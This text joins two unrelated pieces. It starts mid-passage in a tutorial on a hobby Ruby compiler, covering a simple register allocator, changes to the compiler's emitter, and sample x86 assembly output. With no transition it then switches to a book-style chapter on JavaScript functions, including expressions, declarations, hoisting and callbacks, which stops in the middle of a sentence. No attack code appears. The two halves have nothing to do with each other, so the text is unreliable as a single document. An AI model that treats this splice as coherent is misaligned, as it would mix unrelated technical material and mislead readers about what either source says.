True if this cache item can not be evicted because the register is in use. attr_accessor :locked def initialize reg @reg = reg.to_sym end # Spill the (presumed dirty) value in the register in question, # and assume that the register is no longer dirty. @spill is presumed # to contain a block / Proc / object responding to #call that will # handle the spill. def spill! @spill.call if @spill @spill = nil end end The RegisterAllocator class itself is initialized like this: def initialize # This is the list of registers that are available to be allocated @registers = [:edx,:ecx, :edi] # Initially, all registers start out as free. @free_registers = @registers.dup @cached = {} @by_reg = {} # Cache information, by register @order = {} end The @cached and @by_reg hashes contains the Cache objects referenced by variable name and register respectively. @order gets assigned an array of variables in descending order of priority. As previously discussed, this in effect means by descending order of number of times the variable is referenced at this point. Additionally, #with_register initializes two more instance variables as needed: @allocated_registers and @allocators, which holds information on which registers have been allocated for temporary use, and debug information about the code that called #with_register respectively. I won't go through every little method - you can look at the commit (and feel free to ask questions if anything is not clear), but we'll take a look at #cache_reg! which is used to cache a register, as well as evict which is used to remove a variable from the registers (that is, remove the association in the compiler, we do not generate code to actually clear the register), and #with_register, which is used to allocate temporary registers. #cache_reg! will only allocate registers for variables that have been "registered" with the register allocator. First we try to obtain a register from the list of free/unallocated/uncached registers: def cache_reg!(var) if !@order.member?(var.to_sym) return nil end free = @free_registers.shift if free debug_is_register?(free) If a register is found, we create a new Cache object, referencing the register. If not, we (for now) output a warning. If a register is found, it is returned, otherwise, we return nil. c = Cache.new(free) @cached[var.to_sym] = c @by_reg[free] = c else STDERR.puts "NO FREE REGISTER (consider evicting if more important var?)" end free end We'll look at how this is used later. evict has the opposite role: When we need to ensure that a variable is retrieved from memory next time, we pass it. We iterate over the variables passed, and try to delete them from the cache. If they were in fact there, we call the spill handler if one was set. The spill handler is any object (such as a Proc or lambda) that responds to #call, and it is its responsibility to store the contents of the register back to memory before it is freed. This is only assigned if the in-register version of the variable is intentionally modified. We then add the register back in the list of free regsiters. For convenience, I've added an #evict_all method that evicts all currently cached variables. def evict vars Array(vars).collect do |v| cache = @cached.delete(v.to_sym) if cache r = cache.reg debug_is_register?(r) cache.spill! @by_reg.delete(r) @free_registers << r end r ? v : nil end.compact end def evict_all evict(@cached.keys) end The longest method in the register allocator for now is #with_register. This has been lifted from Emitter and adapted, and in fact we've covered changes to that one above, but I'll go through it from scratch. First we check if the client has requested a specific register. If so, we try to retrieve this register. If not, we get the first one available. This is the change we did above to the Emitter version. If none was immediately vailable, we go through the variables cached from least frequently used (in this method), to most, and evict the first one that is not "locked" in place. (Note, there's a potential problem here: The client code does need to be able to handle the case where the preferred register is already taken, as we currently don't go on to evict the variable specifically allocated to that register, but I punted on that when changing the version previously in Emitter - we probably should fix that, but now now) # Allocate a temporary register. If specified, we try to allocate # a specific register. def with_register(required_reg = nil) @allocated_registers ||= Set.new if required_reg free = @free_registers.delete(required_reg) else free = @free_registers.shift end if !free # If no register was immediately free, but one or more # registers is in use as cache, see if we can evict one of # them. if !@cached.empty? # Figure out which register to drop, based on order. # (least frequently used variable evicted first) @order.reverse.each do |v| c = @cached[v] if c && !c.locked reg = c.reg evict(v) free = reg break end end end end The next part is simply debug output, primarily in case we actually run out of registers, which means we're trying to use more temporary registers at one time than the allocator has registers available total (3 currently). It should not happen if we are careful about what we allocate temporary registers for: debug_is_register?(free) if !free # This really should not happen, unless we are # very careless about #with_register blocks. STDERR.puts "===" STDERR.puts @cached.inspect STDERR.puts "--" STDERR.puts @free_registers.inspect STDERR.puts @allocators.inspect raise "Register allocation FAILED" end And some more debug support: # This is for debugging of the allocator - we store # a backtrace of where in the compiler the allocation # was attempted from in case we run out of registers # (which we shouldn't) @allocators ||= [] @allocators << caller Finally, we mark the register as allocated, yield to the client code, and free the register again. # Mark the register as allocated, to prevent it from # being reused. @allocated_registers << free yield(free) # ... and clean up afterwards: @allocators.pop @allocated_registers.delete(free) debug_is_register?(free) @free_registers << free end The changes to compiler.rb are fairly minor. We will go through the changes to each of get_arg, output_functions, compile_if, compile_let and compile_assign from e1049e3 separately, and intersperse that with how it ties in with the changes to Emitter in the same commit. Lets start with #get_arg: @@ -86,7 +86,7 @@ class Compiler # If a Fixnum is given, it's an int -> [:int, a] # If it's a Symbol, its a variable identifier and needs to be looked up within the given scope. # Otherwise, we assume it's a string constant and treat it like one. - def get_arg(scope, a) + def get_arg(scope, a, save = false) return compile_exp(scope, a) if a.is_a?(Array) return [:int, a] if (a.is_a?(Fixnum)) return [:int, a.to_i] if (a.is_a?(Float)) # FIXME: uh. yes. This is a temporary hack @@ -94,7 +94,23 @@ class Compiler if (a.is_a?(Symbol)) name = a.to_s return intern(scope,name.rest) if name[0] == ?: - return scope.get_arg(a) + + arg = scope.get_arg(a) + + # If this is a local variable or argument, we either + # obtain the argument it is cached in, or we cache it + # if possible. If we are calling #get_arg to get + # a target to *save* a value to (assignment), we need + # to mark it as dirty to ensure we save it back to memory + # (spill it) if we need to evict the value from the + # register to use it for something else. + + if arg.first == :lvar || arg.first == :arg + reg = @e.cache_reg!(name, arg.first, arg.last, save) + return [:reg,reg] if reg + end + + return arg end The comment says almost all that needs to be said. The main thing to notice here is the "save" argument, which we'll see used later by compile_assign. Let's take a look at Emitter#cache_reg!. First we see if this variable is currently cached in a register. If save was passed, we mark this entry as dirty, so that if the variable is later evicted from the register, we spill the value back to memory. Regardless whether or not we got a register back, we return, as we certainly don't want to load the value into memory just to overwrite it and then spill it later. (Note that we could add code to request a register and fill it with the modified value, and immediately mark it dirty; in some cases this might be worthwhile by potentially saving us a load later on, but that's speculative enough that I'd want to do real tests first) def cache_reg!(var, atype, aparam, save = false) reg = @allocator.cached_reg(var) if (save) mark_dirty(var, atype, aparam) if reg return reg end Then we output some comments for debugging purposes and to make it easier for us to examine the results of the allocation later on (we might strip this out later), and if the register was not already in the cache, we try to request a register to cache it in, and if we get one we load it: comment("RA: Already cached '#{reg.to_s}' for #{var}") if reg return reg if reg reg = @allocator.cache_reg!(var) return nil if !reg comment("RA: Allocated reg '#{reg.to_s}' for #{var}") if reg comment([atype,aparam,reg].inspect) load(atype,aparam,reg) return reg end Let us also take a quick look at Emitter#mark_dirty: The most important part here is the lambda that is used installed to handle spills. It simply outputs another debug comment, and saves the register back where it came from: def mark_dirty(var, type, src) reg = cached_reg(var) return if !reg comment("Marked #{reg} dirty (#{type.to_s},#{src.to_s})") @allocator.mark_dirty(reg, lambda do comment("Saving #{reg} to #{type.to_s},#{src.to_s}") save(type, reg, src) end) end As for Compiler#output_functions, the only big change there is that it now passes the variable frequency information: varfreq = func.body.respond_to?(:extra) ? func.body.extra[:varfreq] : [] @e.func(name, func.rest?, pos, varfreq) do So lets see what Emitter#func does with it. It ensures all registers are evicted before we generate code for a new function, as the function obviously can't control where it is called from. We then install the new frequency information in the register allocator. And on the way out again, we evict the registers again, for good measure. Actually the latter one is necessary in case any of the registers needs to be spilled. The former one is a precaution - the registers ought to have been evicted before we get there. - def func(name, save_numargs = false, position = nil) + def func(name, save_numargs = false, position = nil,varfreq= nil) @out.emit(".stabs \"#{name}:F(0,0)\",36,0,0,#{name}") export(name, :function) if name.to_s[0] != ?. label(name) @@ -479,12 +518,17 @@ class Emitter lineno(position) if position @out.label(".LFBB#{@curfunc}") + @allocator.evict_all + @allocator.order(varfreq) pushl(:ebp) movl(:esp, :ebp) pushl(:ebx) if save_numargs yield leave ret + + @allocator.evict_all + emit(".size", name.to_s, ".-#{name}") @scopenum ||= 0 @scopenum += 1 @@ -494,6 +538,7 @@ class Emitter end The change to Compiler#compile_if is simple: We simply need to explicitly pass the register to test, rather than rely on it always being %eax: def compile_if(scope, cond, if_arm, else_arm = nil) res = compile_eval_arg(scope, cond) l_else_arm = @e.get_local l_end_if_arm = @e.get_local @e.jmp_on_false(l_else_arm, res) compile_eval_arg(scope, if_arm) @e.jmp(l_end_if_arm) if else_arm @e.local(l_else_arm) compile_eval_arg(scope, else_arm) if else_arm @e.local(l_end_if_arm) if else_arm return [:subexpr] end In compile_let the only change is that we want to ensure we evict all registers that the %s(let ...) node aliases, as otherwise we will be using values from the wrong variable: @e.evict_regs_for(varlist) @e.with_local(vars.size) { compile_do(ls, *args) } @e.evict_regs_for(varlist) In compile_assign, our only concern is passing a truthy value for "save": args = get_arg(scope,left,:save) We'll do one tiny little additional change, and then we'll look at the resulting code. In e74d92d we introduce Emitter#with_register_for: def with_register_for(maybe_reg) c = @allocator.lock_reg(maybe_reg) if c comment("Locked register #{c.reg}") r = yield c.reg comment("Unlocked register #{c.reg}") c.locked = false return r end with_register {|r| emit(:movl, maybe_reg, r); yield(r) } end The purpose of this is as a small optimization in cases where we need a temporary register to hold a variable, but already have the variable in a register. We need to ensure it doesn't get evicted, same as if we allocate a temporary register. And here's the only place we use it so far: def compile_2(scope, left, right) src = compile_eval_arg(scope,left) @e.with_register_for(src) do |reg| # @e.emit(:movl, src, reg) @e.save_result(compile_eval_arg(scope,right)) yield reg end [:subexpr] end }}} If the variable is already in a register, it can save us a movl. ## A quick look at the resulting code ## Let us compile the example code from earlier. It should give something like this: -asm- __method_Object_foo: .stabn 68,0,2,.LM336 -.LFBB61 .LM336: .LFBB61: pushl %ebp movl %esp, %ebp subl $36, %esp .stabn 68,0,3,.LM337 -.LFBB61 .LM337: subl $20, %esp movl $5, -20(%ebp) movl $2, -8(%ebp) movl $5, -12(%ebp) movl $10, -16(%ebp) # RA: Allocated reg 'edx' for a # [:lvar, 0, :edx] movl -8(%ebp), %edx # Locked register edx # RA: Allocated reg 'ecx' for b # [:lvar, 1, :ecx] movl -12(%ebp), %ecx Here we see the first uses, and as you can see from the "Locked" comment above, this also made use of the optimization where we'd previously have allocated another register and moved or reloaded the variable: movl %ecx, %eax addl %edx, %eax # Unlocked register edx And here we're assigning the result of (add a b) back to a, which currently lives in %edx. As a result it is marked "dirty": It needs to be written back to memory when evicted. # Marked edx dirty (lvar,0) movl %eax, %edx # RA: Already cached 'edx' for a # Locked register edx # RA: Allocated reg 'edi' for c # [:lvar, 2, :edi] movl -16(%ebp), %edi And we use a again, from %edx and start reaping the rewards: movl %edi, %eax addl %edx, %eax # Unlocked register edx # Marked edx dirty (lvar,0) movl %eax, %edx Of course, note above, that we could save much more with smarter handling of these registers - in these examples we could have done addl %edi, %edx directly, and saved two further movl's - we have tons of further optimizations to do. And here are some more examples where we reuse a # RA: Already cached 'edx' for a # Locked register edx movl $2, %eax imull %edx, %eax # Unlocked register edx # Marked edx dirty (lvar,0) movl %eax, %edx subl $8, %esp movl $2, %ebx movl $.L83, %eax movl %eax, (%esp) # RA: Already cached 'edx' for a movl %edx, 4(%esp) movl $printf, %eax And here we finally spill a back to memory from %edx, right before we call printf, as %edx can be overwritten: # Saving edx to lvar,0 movl %edx, -8(%ebp) call *%eax (Incidentally, this is where liveness analysis makes a big difference: after the last use of a, it'll still get spilled, but that's of course pointless since this is a local variable) I'd like to reiterate that this is a trivial and primitive allocator. It misses tons of opportunities, and may do stupid things, like load stuff, use it once, have to evict it, load it again, use it once, have to evict it, and so on. The important thing, though, is to get some basic infrastructure in place that we can expand on. We can now later add more advanced logic to determine which variables to cache when with much less effort. Next time, we'll look at another side of this: Caching self in %esi, which we'll handle quite differently (and in a much shorter part...)
https://hokstad.com/compiler/33-register-allocation
CC-MAIN-2021-21
refinedweb
6,043
59.33
Helper utilities for working with JSON and GeoJSON conversions. More... #include <qgsjsonutils.h> Helper utilities for working with JSON and GeoJSON conversions. Definition at line 235 of file qgsjsonutils.h. Encodes a value to a JSON string representation, adding appropriate quotations and escaping where required. Definition at line 258 of file qgsjsonutils.cpp. Exports all attributes from a QgsFeature as a JSON map type. Definition at line 295 of file qgsjsonutils.cpp. Parse a simple array (depth=1). Definition at line 319 of file qgsjsonutils.cpp. Attempts to parse a GeoJSON string to a collection of features. Definition at line 248 of file qgsjsonutils.cpp. Attempts to retrieve the fields from a GeoJSON string representing a collection of features. Definition at line 253 of file qgsjsonutils.cpp.
https://qgis.org/api/classQgsJsonUtils.html
CC-MAIN-2018-51
refinedweb
127
53.68
This topic using the Windows Push Notification service (WNS). When complete, you will be able to broadcast push notifications to all the devices running your app using your notification hub. This tutorial demonstrates a simple broadcast scenario using Notification Hubs. Be sure to follow along with the next tutorial to learn how to use Notification Hubs to address specific users and groups of devices. This tutorial requires the following: Microsoft Visual Studio Express 2013 for Windows with Update 2, create a new Visual C# Store Apps project using the Blank App template. In Solution Explorer, right-click the Windows Store app. (Optional) Repeat steps 4-6 for the Windows Phone Store app project. Back in the Windows Dev Center page for your new app, click Services. In the Services page, click Live Services site under Microsoft Azure Mobile Services. In the App Settings tab, make a note of the values of Client secret and Package security identifier (SID). Security Note The client secret and package SID are important security credentials. Do not share these values with anyone or distribute them with your app. Log on to the Azure Management Portal, and the Connection Information button at the bottom of the page. Take note of the two connection strings. Your notification hub is now configured to work with WNS, and you have the connection strings to register your app and send notifications. In Visual Studio, right-click the solution, then click Manage NuGet Packages. This displays the Manage NuGet Packages dialog box. WindowsAzure.Messaging.Managed and click Install, select all projects in the solution, and accept the terms of use. This downloads, installs, and adds a reference in all projects to the Azure Messaging library for Windows using the WindowsAzure.Messaging.Managed NuGet package. Open the App.xaml.cs project file and add the following using statements: using Windows.Networking.PushNotifications; using Microsoft.WindowsAzure.Messaging; using Windows.UI.Popups; In a universal project, this file is located in the <project_name>.Shared folder.URI for the app from WNS, and then registers that ChannelURI with your notification hub. Make sure to replace the "hub name" placeholder with the name of the notification hub that appears in the. In Solution Explorer double-click Package.appxmanifest of the Windows Store app, in Notifications, set Toast capable to Yes: From the File menu, click Save All. (Optional) Repeat the previous step in the Windows Phone Store app project. Press the F5 key to run the app. A popup dialog with the registration key is displayed. (Optional) Repeat the previous step to run the other project. Your app is now ready to receive toast notifications. You can send notifications using Notification Hubs from any back-end using the REST interface. In this tutorial you send notifications with a .NET console application. For an example of how to send notifications from an Azure Mobile Services backend integrated with Notification Hubs, see Get started with push notifications in Mobile Services (.NET backend | JavaScript backend). For an example of how to send notifications using the REST APIs, see How to use Notification Hubs from Java/PHP (Java | PHP). Right-click the solution, select Add and New Project..., then under Visual C# click Windows and Console Application and click OK. This adds a new Visual C# console application to the solution. You can also do this in a separate solution. In Visual Studio, click Tools, then click Nuget Package Manager, then click Package Manager Console. This displays the Package Manager Console in Visual Studio. In the Package Manager Console window, set the Default project to your new console application project, then in the console window execute the following command: Install-Package WindowsAzure.ServiceBus This adds a reference to the Azure Service Bus SDK with the WindowsAzure.ServiceBus NuGet package. Open the file Program.cs and add the following using statement: using Microsoft.ServiceBus.Notifications; portal on the Notification Hubs tab. Also, replace the connection string placeholder with the connection string called DefaultFullSharedAccessSignature that you obtained in the section "Configure your Notification Hub." Then taping on the toast banner loads the app. You can find all the supported payloads in the toast catalog, tile catalog, and badge overview topics on MSDN..
http://azure.microsoft.com/en-us/documentation/articles/notification-hubs-windows-store-dotnet-get-started/
CC-MAIN-2015-22
refinedweb
700
50.63
Your switch statement is being executed every iteration of the loop which means you are constantly un-patching patching the cord. The switch statement should only be executed once for every button......... I was slightly confused when the teensy didn't show up as a usb serial device and the Serial.print() still worked. It all makes sense now. Thanks for the clarification. The culprit? 18418 Lower the clearance value in the Copper Zone Properties. Nothing that can't be fixed with a piece of wire and some solder fumes. Don't know if it is intentional or not... Follow up: USB Type: "MIDI" seems to act like "Serial + MIDI" since Serial.print() still shows up in serial monitor. Just put the code for changing the oscillator waveform in loop(), just as you did for the filter frequency. MacOS 10.13.6 USB Type: "MIDI" Works in both directions, IN/OUT. USB Type: "Serial + MIDI" Does not compile.... You can choose your ADC_REFERENCE to be REF_3V3(default), REF_1V2 or REF_EXT. Gain formula for inverting opamp is Gain = Rfeedback/Rin = Vout/Vin Gain Vin = 1.2V(Vout range)/10V(Vin range) =... As Wibbing mentioned you need to use a rail to rail opamp supplied with 3.3V otherwise you might damage your teensy. Since eurorack modules are usually powered by -12V, 12V, all inputs should be... Are you sure about that? I was under impression(looking at the code but i might be wrong) that unity gain is handled as a special case in both the mixer and the amp, but that zero gain is only... @daspuru In order to have an audio object with an input to stop processing you need to stop the audiostream going to it's input. There are 2 ways to achieve this: use AudioConnection::disconnect... Assuming the coolant tmp returned by the CAN bus can be < 60deg or > 120deg but you want the stepper only to move between 60deg and 120deg and that the temp reading is linear. I took the liberty... Thanks for the tip. Works like a charm. I never thought about the need for "a couple of hundreds" of connections. I totally agree! Please post your findings, I'll be glad to help testing. There is no need to modify connect() in Audiostream if you do the following: Instantiate all possible AudioConnections needed in the project(in the global scope, as usual). Multiple sources to one... You need to explicitly set the text background color. If not, printing text will behave as you described(transparent background). tft.setTextColor(ILI9341_WHITE); //white text with transparent... Pretty sure the Rev D schematic is wrong. Pin 7 & 8 should be swapped. The SPI pin definitions in effect_delay_ext.cpp don't matter when using a T4 since it has no alternate pins for SPI. Thus the pin numbers are hard coded as seen in the T4 portion of SPI.cpp. ... I did not try your code but if you want to use the print statement to send floats you need to be aware that by default it will only send 2 digits after the decimal point. If you want more decimal... Because the SPI0 clock signal (SCK) for the T40 is on pin13 and for the T36 it is on pin14. And that signal is needed to access the external memory chip. @DD4WH, you're welcome. Glad those pictures helped you push your limits. Physical contact does not mean electrical contact. There might be some glue residue from the paper tape at the extremities of the resistor legs. @rusty113 I could be wrong but looking at your first picture it seems your didn't solder the wires to the resistors. If so, how do you expect it to work? oops, misunderstood the question. correction: // Button Toggle In Code #include <Bounce.h> const int channel = 1; bool toggleState = false; What about this? // Button Toggle In Code #include <Bounce.h> const int channel = 1; Bounce button0 = Bounce(0, 10); @DD4WH Antratek has revD audio shields in stock. They ship from the Netherlands if I'm not mistaken.
https://forum.pjrc.com/search.php?s=adbac75cbc158347d8c85a04cab9534d&searchid=5176569
CC-MAIN-2020-05
refinedweb
678
76.93
Motivation: So I had been tooling around trying to get concurrency working, wanting delays, and trying to debounce a switch, amongst other things. There's all sorts of solutions available, including protothreads, RTOSs, coroutines, etc.. I found most of them difficult to understand or problematical to use. For example, you don't want to switch to an RTOS, because that's a whole new environment. Solution: Enter my idea of a Pauser class. It could also be implemented in C, if you like. I'll use MicroPython in this example, but minor tweaks will make it compatible with Python. I'll explain how it works by way of example: debouncing a button. Debouncing a button is a surprisingly difficult endeavour. Let's see if we can't simplify things! Suppose sw1 is a button switch, which you've set up correctly as an input pullup. sw1.value() returns whether the pin is high or low. I think you use digitalRead on regular Python. A value of 1 means the button isn't pressed, whilst 0 means it is pressed. So, the first step is to set up a "pauser": The pauser class is instantiated. Then, using the pause() command, we set up a callback function, a condition under which the callback function is activated, and an optional delay until the condition is tested. Code: Select all p = Pauser() p.pause(button_pressed, condition = lambda: sw1.value() == 0) We need to periodically update the pauser, which we can do in our main loop: The update() function checks to see if there's anything to do, waits (or not) for a delay, and then triggers the callback if the condition is satisfied. Code: Select all def myloop(): while True: p.update() Here's the implementation of button_pressed(): So it does whatever you want, in this case printing "Button Pressed", and then changes state. Note that the callback takes the pauser as an argument so that it can do that. What the third line is doing is saying "wait for 20ms, then if the button has gone high again, call the button_released() function". Code: Select all def button_pressed(pauser): print('Button pressed') pauser.pause(button_released, condition = lambda: sw1.value() == 1, delay_ms = 20) This is how button_released() is implemented: It basically does the opposite: wait for 20ms, then if the switch is low again, switch back to button_pressed(). Code: Select all def button_released(pauser): #print("Button released") pauser.pause(button_pressed, condition = lambda: sw1.value() == 0, delay_ms = 20) Note that the delay doesn't block the operation of anything else. Huzzah! Here's the implementation of Pauser: Code: Select all class Pauser: def __init__(self): self.callback = None self.condition = None self.start = None self.delay_ms = None def pause(self, callback, condition = None, delay_ms = 0): self.callback = callback self.condition = condition self.start = ticks_ms() self.delay_ms = delay_ms def update(self): if self.callback == None: return if ticks_diff(ticks_ms(), self.start) < self.delay_ms: return try: triggered = self.condition() except TypeError: triggered = True if triggered: fn = self.callback self.callback = None fn(self)
https://lb.raspberrypi.org/forums/viewtopic.php?t=241678
CC-MAIN-2020-05
refinedweb
505
60.41
#include <assert.h> #include <inttypes.h> #include <stdbool.h> #include "nvim/api/private/helpers.h" #include "nvim/ascii.h" #include "nvim/buffer.h" #include "nvim/charset.h" #include "nvim/cursor.h" #include "nvim/diff.h" #include "nvim/edit.h" #include "nvim/eval.h" #include "nvim/ex_cmds.h" #include "nvim/ex_cmds2.h" #include "nvim/ex_docmd.h" #include "nvim/ex_eval.h" #include "nvim/ex_getln.h" #include "nvim/file_search.h" #include "nvim/fileio.h" #include "nvim/fold.h" #include "nvim/garray.h" #include "nvim/getchar.h" #include "nvim/globals.h" #include "nvim/hashtab.h" #include "nvim/main.h" #include "nvim/mark.h" #include "nvim/match/plines.h" #include "nvim/quickfix.h" #include "nvim/regexp.h" #include "nvim/screen.h" #include "nvim/search.h" #include "nvim/state.h" #include "nvim/strings.h" #include "nvim/syntax.h" #include "nvim/terminal.h" #include "nvim/ui.h" #include "nvim/ui_compositor.h" #include "nvim/undo.h" #include "nvim/vim.h" #include "nvim/window.h" flags for win_enter_ext() Jump to the first open window in any tab page that contains buffer "buf", if one exists. Jump to the first open window that contains buffer "buf", if one exists. Returns a pointer to the window found, otherwise NULL. Correct the cursor line number in other windows. Used after changing the current buffer, and before applying autocommands. Try to close all windows except current one. Buffers in the other windows become hidden if 'hidden' is set, or '!' is used and the buffer was modified. Used by ":bdel" and ":only". Close tabpage tab, assuming it has no windows in it. There must be another tabpage or this will crash. Closes all windows for buffer buf unless there is only one non-floating window. Init the current window "curwin". Called when a new file is being edited. all CTRL-W window commands are handled here, called from normal_cmd(). Used after making another window the current one: change directory if needed. Set a new height for a frame. Recursively sets the height for contained frames and windows. Caller must take care of positions. Return the number of lines used by the global statusline. Go to the last accessed tab page, if there is one. Go to tabpage "tp". Note: doesn't update the GUI tab. if wp is the last non-floating window always false for a floating window Add or remove a status line from window(s), according to the value of 'laststatus'. Check that the specified window is the last one. Make "count" windows on the screen. Must be called when there is just one window, filling the whole screen (excluding the command line). Trigger WinScrolled for "curwin" if needed. Return the minimal number of rows that is needed on the screen to display the current number of windows. Like ONE_WINDOW but only considers non-floating windows. Check that current tab page contains no more then one window other than aucmd_win. Check that there is only one window (and only one tab page), not counting a help or preview window, unless it is the current window. Does not count "aucmd_win". Does not count floats unless it is current. Reset cursor and topline to its stored values from check_lnums(). check_lnums() must have been called first! Restore the current buffer after using switch_buffer(). Restore a previously created snapshot, if there is any. This is only done if the screen size didn't change and the window layout is still the same. Make "buf" the current buffer. restore_buffer() MUST be called to undo. No autocommands will be executed. Use aucmd_prepbuf() if there are any. Set "win" to be the curwin and "tp" to be the current tab page. restore_win() MUST be called to undo, also when FAIL is returned. No autocommands will be executed until restore_win() is called. Return the number of lines used by the tab page line. Check that tpc points to a valid tab page. Returns true when tpc is valid and at least one window is valid. Status line of dragwin is dragged "offset" lines down (negative is up). Make window wp the current window. Make all windows the same height. 'next_curwin' will soon be the current window, make sure it has enough rows. Return the number of fold columns to display. Get the left or right neighbor window of the specified window. Returns the specified window if the neighbor is not found. Returns the previous window if the specifiecied window is a floating window. Create a new float. Create a new tabpage with one window. It will edit the current buffer, like after :split. Set the width of a window. Remove a window from the window list. Check if "win" is a pointer to an existing window in the current tabpage. Check if "win" is a pointer to an existing window in any tabpage. Return true if "win" is floating window in the current tab page. Get the above or below neighbor window of the specified window. Returns the specified window if the neighbor is not found. Returns the previous window if the specifiecied window is a floating window. Remove a window and its frame from the tree of frames.
https://neovim.io/doc/dev/window_8c.html
CC-MAIN-2022-21
refinedweb
850
72.73
sigblock() Add to the mask of signals to block Synopsis: #include <unix.h> int sigblock( int mask ); Arguments: - mask - A bitmask of the signals that you want to block. Library: libc Use the -l c option to qcc to link against this library. This library is usually included automatically. Description: The sigblock() function adds the signals specified in mask to the set of signals currently being blocked from delivery. Signals are blocked if the appropriate bit in mask is a 1; the macro sigmask() is provided to construct the mask for a given signum. The sigblock() returns the previous mask. You can restore the previous mask by calling sigsetmask(). In normal usage, a signal is blocked using sigblock(). To begin a critical section, variables modified on the occurrence of the signal are examined to determine that there.
http://developer.blackberry.com/native/reference/bb10/com.qnx.doc.neutrino.lib_ref/topic/s/sigblock.html
CC-MAIN-2013-20
refinedweb
137
66.13
Mastering functions is an essential skill for the JavaScript programmer because the language has many uses for them. They perform a variety of tasks for which other languages may have special syntax. In this chapter you will learn about the different ways to define a function in JavaScript, you will learn about function expressions and function declarations, and you will see how the local scope and the variable hoisting works. Then you will learn about a number of patterns that help your APIs (providing better interfaces to your functions), code initializations (with fewer globals), and performance (in other words—work avoidance). Let’s dive into functions, starting by first reviewing and clarifying the important basics. There are two main features of the functions in JavaScript that make them special—the first is that functions are first-class objects and the second is that they provide scope. Functions are objects that: Can be created dynamically at runtime, during the execution of the program Can be assigned to variables, can have their references copied to other variables, can be augmented, and, except for a few special cases, can be deleted Can be passed as arguments to other functions and can also be returned by other functions Can have their own properties and methods So it could happen that a function A, being an object, has properties and methods, one of which happens to be another function B. Then B can accept a function C as an argument and, when executed, can return another function D. At first sight, that’s a lot of functions to keep track of. But when you’re comfortable with the various applications of the functions, you get to appreciate the power, flexibility, and expressiveness that functions can offer. In general, when you think of a function in JavaScript, think of an object, with the only special feature that this object is invokable, meaning it can be executed. The fact that functions are objects becomes obvious when you see the new Function() constructor in action: // antipattern // for demo purposes only var add = new Function('a, b', 'return a + b'); add(1, 2); // returns 3 In this code, there’s no doubt that add() is an object; after all it was created by a constructor. Using the Function() constructor is not a good idea though (it’s as bad as eval()) because code is passed around as a string and evaluated. It’s also inconvenient to write (and read) because you have to escape quotes and take extra care if you want to properly indent the code inside the function for readability. The second important feature is that functions provide scope. In JavaScript there’s no curly braces local scope; in other words, blocks don’t create scope. There’s only function scope. Any variable defined with var inside of a function is a local variable, invisible outside the function. Saying that curly braces don’t provide local scope means that if you define a variable with var inside of an if condition or inside of a for or a while loop, that doesn’t mean the variable is local to that if or for. It’s only local to the wrapping function, and if there’s no wrapping function, it becomes a global variable. As discussed in Chapter 2, minimizing the number of globals is a good habit, so functions are indispensable when it comes to keeping the variable scope under control. Let’s take a moment to discuss the terminology surrounding the code used to define a function, because using accurate and agreed-upon names is just as important as the code when talking about patterns. Consider the following snippet: // named function expression var add = function add(a, b) { return a + b; }; The preceding code shows a function, which uses a named function expression. If you skip the name (the second add in the example) in the function expression, you get an unnamed function expression, also known as simply as function expression or most commonly as an anonymous function. An example is: // function expression, a.k.a. anonymous function var add = function (a, b) { return a + b; }; So the broader term is “function expression” and the “named function expression” is a specific case of a function expression, which happens to define the optional name. When you omit the second add and end up with an unnamed function expression, this won’t affect the definition and the consecutive invocations of the function. The only difference is that the name property of the function object will be a blank string. The name property is an extension of the language (it’s not part of the ECMA standard) but widely available in many environments. If you keep the second add, then the property add.name will contain the string “add.” The name property is useful when using debuggers, such as Firebug, or when calling the same function recursively from itself; otherwise you can just skip it. Finally, you have function declarations. They look the most similar to functions used in other languages: function foo() { // function body goes here } In terms of syntax, named function expressions and function declarations look similar, especially if you don’t assign the result of the function expression to a variable (as we’ll see in the callback pattern further in the chapter). Sometimes there’s no other way to tell the difference between a function declaration and a named function expression other than looking at the context in which the function occurs, as you’ll see in the next section. There’s syntax difference between the two in the trailing semicolon. The semicolon is not needed in function declarations but is required in function expressions, and you should always use it even though the automatic semicolon insertion mechanism might do it for you. The term function literal is also commonly used. It may mean either a function expression or a named function expression. Because of this ambiguity, it’s probably better if we don’t use it. So what should you use—function declarations or function expressions? In cases in which syntactically you cannot use a declaration, this dilemma is solved for you. Examples include passing a function object as a parameter or defining methods in object literals: // this is a function expression, // pased as an argument to the function `callMe` callMe(function () { // I am an unnamed function expression // also known as an anonymous function }); // this is a named function expression callMe(function me() { // I am a named function expression // and my name is "me" }); // another function expression var myobject = { say: function () { // I am a function expression } }; Function declarations can only appear in “program code,” meaning inside of the bodies of other functions or in the global space. Their definitions cannot be assigned to variables or properties, or appear in function invocations as parameters. Here’s an example of the allowed usage of function declarations, where all the functions foo(), bar(), and local() are defined using the function declaration pattern: // global scope function foo() {} function local() { // local scope function bar() {} return bar; } Another thing to consider when choosing a function definition pattern is the availability of the read-only name property. Again, this property is not standard but available in many environments. In function declarations and named function expressions, the name property is defined. In anonymous function expressions, it depends on the implementation; it could be undefined (IE) or defined with an empty string (Firefox, WebKit): function foo() {} // declaration var bar = function () {}; // expression var baz = function baz() {}; // named expression foo.name; // "foo" bar.name; // "" baz.name; // "baz" The name property is useful when debugging code in Firebug or other debuggers. When the debugger needs to show you an error in a function, it can check for the presence of the name property and use it as an indicator. The name property is also used to call the same function recursively from within itself. If you were not interested in these two cases, then an unnamed function expression would be easier and less verbose. The case against function declarations and the reason to prefer function expressions is that the expressions highlight that functions are objects like all other objects and not some special language construct. From the previous discussion you may conclude that the behavior of function declarations is pretty much equivalent to a named function expression. That’s not exactly true, and a difference lies in the hoisting behavior. The term hoisting is not defined in ECMAScript, but it’s common and a good way to describe the behavior. As you know, all variables, no matter where in the function body they are declared, get hoisted to the top of the function behind the scenes. The same applies for functions because they are just objects assigned to variables. The only “gotcha” is that when using a function declaration, the definition of the function also gets hoisted, not only its declaration. Consider this snippet: //). Now that the required background and terminology surrounding functions is out of the way, let’s see some of the good patterns related to functions that JavaScript has to offer, starting with the callback pattern. Again, it’s important to remember the two special features of the functions in JavaScript: They are objects. They provide local scope. Functions are objects, which means that they can be passed as arguments to other functions. When you pass the function introduceBugs() as a parameter to the function writeCode(), then at some point writeCode() is likely to execute (or call) introduceBugs(). In this case introduceBugs() is called a callback function or simply a callback: function writeCode(callback) { // do something... callback(); // ... } function introduceBugs() { // ... make bugs } writeCode(introduceBugs); Note how introduceBugs() is passed as an argument to writeCode() without the parentheses. Parentheses execute a function whereas in this case we want to pass only a reference to the function and let writeCode() execute it (in other words, call it back) when appropriate. Let’s take an example and start without a callback first and then refactor later. Imagine you have a general-purpose function that does some complicated work and returns a large data set as a result. This generic function could be called, for example, 